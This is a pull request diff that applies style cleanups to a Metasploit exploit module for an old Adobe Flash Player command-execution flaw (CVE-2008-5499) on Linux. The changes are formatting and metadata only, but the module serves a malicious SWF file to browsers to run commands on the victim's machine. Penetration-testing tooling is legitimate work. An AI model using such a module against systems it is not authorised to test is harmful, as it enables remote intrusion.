### PR TITLE
modules/exploits/linux/browser: Resolve RuboCop violations

### DIFF
--- a/modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb
+++ b/modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb
@@ -55,9 +55,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def exploit
     path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2008-5499.swf')
-    fd = File.open(path, 'rb')
-    @swf = fd.read(fd.stat.size)
-    fd.close
+    @swf = File.binread(path)
 
     super
   end

--- a/modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb
+++ b/modules/exploits/linux/browser/adobe_flashplayer_aslaunch.rb
@@ -9,9 +9,11 @@ class MetasploitModule < Msf::Exploit::Remote
   include Msf::Exploit::Remote::HttpServer::HTML
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Adobe Flash Player ActionScript Launch Command Execution Vulnerability',
-      'Description'    => %q{
+    super(
+      update_info(
+        info,
+        'Name' => 'Adobe Flash Player ActionScript Launch Command Execution Vulnerability',
+        'Description' => %q{
           This module exploits a vulnerability in Adobe Flash Player for Linux,
           version 10.0.12.36 and 9.0.151.0 and prior.
           An input validation vulnerability allows command execution when the browser
@@ -21,37 +23,39 @@ class MetasploitModule < Msf::Exploit::Remote
           The victim must have Adobe AIR installed for the exploit to work. This module
           was tested against version 10.0.12.36 (10r12_36).
         },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
+        'License' => MSF_LICENSE,
+        'Author' => [
           '0a29406d9794e4f9b30b3c5d6702c708', # Metasploit version
         ],
-      'References'     =>
-        [
+        'References' => [
           ['CVE', '2008-5499'],
           ['OSVDB', '50796'],
           ['BID', '32896'],
           ['URL', 'http://www.adobe.com/support/security/bulletins/apsb08-24.html']
         ],
-      'DefaultOptions' =>
-        {
+        'DefaultOptions' => {
           'HTTP::compression' => 'gzip',
-          'HTTP::chunked'     => true
+          'HTTP::chunked' => true
         },
-      'Platform'       => 'unix', # so unix cmd exec payloads are ok
-      'Arch'           => ARCH_CMD,
-      'Targets'        =>
-        [
+        'Platform' => 'unix', # so unix cmd exec payloads are ok
+        'Arch' => ARCH_CMD,
+        'Targets' => [
           [ 'Automatic', {}],
         ],
-      'DisclosureDate' => '2008-12-17',
-      'DefaultTarget'  => 0))
-
+        'DisclosureDate' => '2008-12-17',
+        'DefaultTarget' => 0,
+        'Notes' => {
+          'Stability' => [CRASH_SERVICE_DOWN],
+          'SideEffects' => [],
+          'Reliability' => [REPEATABLE_SESSION]
+        }
+      )
+    )
   end
 
   def exploit
-    path = File.join( Msf::Config.data_directory, "exploits", "CVE-2008-5499.swf" )
-    fd = File.open( path, "rb" )
+    path = File.join(Msf::Config.data_directory, 'exploits', 'CVE-2008-5499.swf')
+    fd = File.open(path, 'rb')
     @swf = fd.read(fd.stat.size)
     fd.close
 
@@ -59,11 +63,11 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def on_request_uri(cli, request)
-    msg = "#{cli.peerhost.ljust(16)} #{self.shortname}"
+    msg = "#{cli.peerhost.ljust(16)} #{shortname}"
     trigger = @swf
-    trigger_file = rand_text_alpha(rand(6)+3) + ".swf"
+    trigger_file = rand_text_alpha(3..8) + '.swf'
 
-    obj_id = rand_text_alpha(rand(6)+3)
+    obj_id = rand_text_alpha(3..8)
 
     if request.uri.match(/\.swf/i)
       print_status("#{msg} Sending Exploit SWF")
@@ -76,7 +80,7 @@ class MetasploitModule < Msf::Exploit::Remote
       return
     end
 
-    html =  <<-EOS
+    html = <<-EOS
     <html>
       <head>
       </head>


### PR DESCRIPTION
Most violations resolved with `rubocop -A`, except notes.

